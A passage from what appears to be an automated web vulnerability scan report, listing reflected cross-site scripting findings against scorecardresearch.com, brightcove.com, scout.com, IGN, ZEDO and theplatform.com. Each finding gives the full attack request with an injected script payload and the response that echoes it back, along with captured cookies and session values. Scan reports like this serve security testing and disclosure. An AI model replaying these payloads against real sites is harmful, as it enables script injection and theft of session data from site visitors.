Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:23 GMT
Date: Tue, 04 Oct 2011 20:15:23 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"349210<script>alert(1)</script>90075246625", c2:"7117341", c3:"5797640", c4:"44103179", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});



1.24. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 5f83e<script>alert(1)</script>da15b6e6336 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=71173415f83e<script>alert(1)</script>da15b6e6336&c3=5797640&c4=44103179&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:24 GMT
Date: Tue, 04 Oct 2011 20:15:24 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"71173415f83e<script>alert(1)</script>da15b6e6336", c3:"5797640", c4:"44103179", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});



1.25. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 468d6<script>alert(1)</script>893df73b0c6 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640468d6<script>alert(1)</script>893df73b0c6&c4=44103179&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:24 GMT
Date: Tue, 04 Oct 2011 20:15:24 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640468d6<script>alert(1)</script>893df73b0c6", c4:"44103179", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});



1.26. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 25e89<script>alert(1)</script>c6c67ced0d5 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640&c4=4410317925e89<script>alert(1)</script>c6c67ced0d5&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:25 GMT
Date: Tue, 04 Oct 2011 20:15:25 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640", c4:"4410317925e89<script>alert(1)</script>c6c67ced0d5", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});



1.27. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 59fe7<script>alert(1)</script>3259b533bda was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640&c4=44103179&c5=7050363759fe7<script>alert(1)</script>3259b533bda&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:25 GMT
Date: Tue, 04 Oct 2011 20:15:25 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640", c4:"44103179", c5:"7050363759fe7<script>alert(1)</script>3259b533bda", c6:"", c10:"", c15:"", c16:"", r:""});



1.28. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ee0c7<script>alert(1)</script>baa6f3b66f9 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640&c4=44103179&c5=70503637&c6=ee0c7<script>alert(1)</script>baa6f3b66f9 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:26 GMT
Date: Tue, 04 Oct 2011 20:15:26 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640", c4:"44103179", c5:"70503637", c6:"ee0c7<script>alert(1)</script>baa6f3b66f9", c10:"", c15:"", c16:"", r:""});



1.29. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 4fba7<script>alert(1)</script>30751131f5a was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAAAEDRq0~,qRcfDOX2mNu3MBQVberx3rCXi0MGsF8M HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Content-Length: 554
Origin: http://c.brightcove.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-amf
Accept: */*
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=472&height=310&flashID=1159880448001&bgcolor=%23FFFFFF&playerID=889778564001&playerKey=AQ~~%2CAAAAAAEDRq0~%2CqRcfDOX2mNu3MBQVberx3rCXi0MGsF8M&isVid=true&isUI=true&dynamicStreaming=true&autoStart=false&mute=false&%40videoPlayer=1159880448001&wmode=opaque&debuggerID=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q8522cb0274262408ea8339a7e8ccbda9753644d9
cccom.brightcove.experience.ViewerExperienceRequest.experienceId.de
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 22:20:02 GMT
Server:
Content-Length: 6440

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
p4j.....eAQ~~,AAAAAAEDRq0~,qRcfDOX2mNu3MBQVberx3rCXi0MGsF8M.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bp..1......ivideoPlayer4fba7<script>alert(1)</script>30751131f5a.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

1.30. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /feeds/analyticsfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c5b5e<script>alert(1)</script>efaaefa4819 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/analyticsfeed.ashx?page=http%3A//www.scout.com/&format=json&callback=$.analytics.reportc5b5e<script>alert(1)</script>efaaefa4819 HTTP/1.1
Host: cdn-cms.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.scout.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=T8kdbWQMqa2-XMYANwA; sample=38; __utma=202704078.1428052287.1317753697.1317753697.1317756177.2; __utmz=202704078.1317756177.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Scoutweb11
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.30012
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 340
Date: Tue, 04 Oct 2011 20:14:24 GMT
Connection: close
Akamai: True

$.analytics.reportc5b5e<script>alert(1)</script>efaaefa4819({"network":"Scout","site":"www","sports":[],"categories":[],"pagetype":"FrontPage","pagesubtype":"","author":"","dateoverride":{"rfc822":"","year":"","month":"","day":"","hour":"","minute":"","second"
...[SNIP]...

1.31. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f7c4b<img%20src%3da%20onerror%3dalert(1)>48071189668 was submitted in the callback parameter. This input was echoed as f7c4b<img src=a onerror=alert(1)>48071189668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /adfeed.ashx?s=143&p=1&c=1&format=json&callback=$.showAd.cacheAdCodesf7c4b<img%20src%3da%20onerror%3dalert(1)>48071189668 HTTP/1.1
Host: cdn-forums.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.scout.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=T8kdbWQMqa2-XMYANwA; sample=38; __utma=202704078.1428052287.1317753697.1317753697.1317756177.2; __utmz=202704078.1317756177.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: MBRD25
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 367
Date: Tue, 04 Oct 2011 20:14:28 GMT
Connection: close
Akamai: True

$.showAd.cacheAdCodesf7c4b<img src=a onerror=alert(1)>48071189668({"ads":[{"code":"SPTSN1","height":90,"type":"DISPLAY","width":728},{"code":"SPTSN3","height":600,"type":"DISPLAY","width":160},{"code":"SPTSHP","height":250,"type":"DISPLAY","width":300},{"code":"SPTS
...[SNIP]...

1.32. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1055c"-alert(1)-"1670b2a4751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact/?1055c"-alert(1)-"1670b2a4751=1 HTTP/1.1
Host: corp.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:06:33 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1317765778922v-3n-12mc+1317765778922mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 14757

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Contact - IGN Entertainment</title>
<link rel="stylesheet" href="http://co
...[SNIP]...
pt>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/contact/?1055c"-alert(1)-"1670b2a4751=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.33. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 267cd"><script>alert(1)</script>ec564ca3669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?267cd"><script>alert(1)</script>ec564ca3669=1 HTTP/1.1
Host: corp.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:06:29 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1317765778922v-3n-12mc+1317765778922mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 14786

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Contact - IGN Entertainment</title>
<link rel="stylesheet" href="http://co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/contact/?267cd"><script>alert(1)</script>ec564ca3669=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.34. http://d7.zedo.com/jsc/d3/fl.js [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70eed'%3balert(1)//04d7e844b73 was submitted in the p parameter. This input was echoed as 70eed';alert(1)//04d7e844b73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1302&c=174&r=21&d=31&w=298&h=70&p=7105cu70eed'%3balert(1)//04d7e844b73&z=0.2418893207795918 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/cj/V121A059CF4J-573I706K63342132177B6AK63720K63690QK63352QQP0G00G0Q0704DB43000058/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24; PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199; ZEDOIDX=29; FFAbh=977B809,20|40_1#391:305,20|149_1#365:162,20|636_1#381; FFBbh=1003B809,20|40_1#10:162,20|636_1#16:305,20|149_1#0; ZFFAbh=977B826,20|121_977#365; ZFFBbh=1006B826,20|121_977#0; ZCBC=1; FFgeo=5386156; FFcat=1302,69,9:1302,197,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "2202213-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=781
Expires: Tue, 04 Oct 2011 20:23:50 GMT
Date: Tue, 04 Oct 2011 20:10:49 GMT
Content-Length: 2265
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=0;var zzPat='';

var zzhasAd;


               
...[SNIP]...
3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1317732010%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1249847%3Bh%3D1249740%3Bk=http://howlifeworks.com/shopping/penny_auction_solo/?AG_ID=991&cid=7105cu70eed';alert(1)//04d7e844b73">
...[SNIP]...

1.35. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/JV5bOqASsrxR

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c007e<script>alert(1)</script>3c5b4edbedc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sc007e<script>alert(1)</script>3c5b4edbedc/fox.com/JV5bOqASsrxR?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e8b68323a9f498627a39536c4a86065e90c96a27888e733466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 04 Oct 2011 20:19:16 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1428
Server: Jetty(6.1.19)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /sc007e<script>alert(1)</script>3c5b4edbedc/fox.com/JV5bOqASsrxR. Reason:
<pre>
...[SNIP]...

1.36. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [feed parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/JV5bOqASsrxR

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload db47d<script>alert(1)</script>0e109b9d114 was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /s/fox.com/JV5bOqASsrxR?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clipsdb47d<script>alert(1)</script>0e109b9d114&sig=004e8b68323a9f498627a39536c4a86065e90c96a27888e733466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
